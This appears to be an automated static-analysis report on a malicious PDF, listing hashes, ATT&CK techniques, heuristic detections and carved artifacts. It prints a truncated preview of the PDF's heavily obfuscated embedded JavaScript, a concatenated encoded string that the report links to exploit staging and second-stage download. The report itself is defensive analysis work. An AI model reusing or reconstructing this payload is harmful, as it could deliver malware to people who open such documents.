Malicious PDF — malware analysis report

Static analysis result for SHA-256 75714eccfeb843ee…

MALICIOUS

PDF

19.3 KB Created: 2012-09-17 23:33:20 +04:00 Authoring application: Adobe Acrobat 10.0 (via Acrobat Web Capture 10.0)
MD5: d5cce94b5568ded9ba5c4c718da09c69 SHA-1: 08e5c90c5eb46b6843f9bd0219443838e3e0f78f SHA-256: 75714eccfeb843ee454492d9b699bccdf0a0afb3f45e7fa03505f3c7e1da6bee
118 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript, flagged as a PDF JavaScript exploit cluster. The JavaScript code is heavily obfuscated using string concatenation and `String.fromCharCode`, indicating an attempt to hide malicious functionality. This script is likely responsible for downloading and executing a second-stage payload, a common technique for malware delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://www.iec.chIn PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0019_000.js
79b1e3648ff246d2120a0ddec1b5e312df1aa36c750cee1f949e6d03ee1380f2		 pdf-javascript-stream PDF /JS object 19 at offset 0x2DE 8220 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 10 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
xx='b';
a='353d3m3a1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1n351j39163o1o1l1n1i163o1o1m1n1q163o1n371n37163o1o1k1n1m163o1j381n1m163o1n1m1n1k163o1n391n1j163o1n391n36163o1n1q1o1h163o1j381n39163o1n391n1k163o1j391n37163o1o1m1o1h163o1n361n1j163o1n1k1n1q163o1l1i1j39163o1m1k1m1k163o1l1k1l39163o1l1i1l1q163o1l1m1m1l163o1j381k1l163o1o1p1n1m163o1h1h1n1m163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1a3u3q3'+xx+'3c3f38193l341f3f383h3a3n3'+xx+'1'+xx+'1j1t3k3s1a3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3a191h1d3k3s1g1j1a1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191a3u3p343l11373e3a1u3h383q11233l3l343s191a1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3a1a1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3a3n3'+xx+'1'+xx+'1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1a1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131a1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1a1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1a1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1a3u373e3a2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131a1s3q3'+xx+'3c3f38193i3p383l393f3i3q1f3f383h3a3n3'+xx+'1t1l1l1q1m1j1a3u3i3p383l393f3i3q1c1u3i3p383l393f3i3q413n3'+xx+'3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2'+xx+'3h393i193u3m3o353d1r13131d3g3m3a1r3i3p383l393f3i3q411a41393o3h363n3c3i3h113j3l3c3h3n39191a3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131a1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3a1a1s3'+xx+'38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3a353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h
... (truncated)
icc_00_off000029b5.icc
653b586c4707574ffcd648ba35494daed2c76ceafcf4c07d315ed961b1dc347f		 pdf-icc-profile PDF ICC profile at offset 0x29B5 408 bytes
icc_01_off00002c50.icc
2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e		 pdf-icc-profile PDF ICC profile at offset 0x2C50 3144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.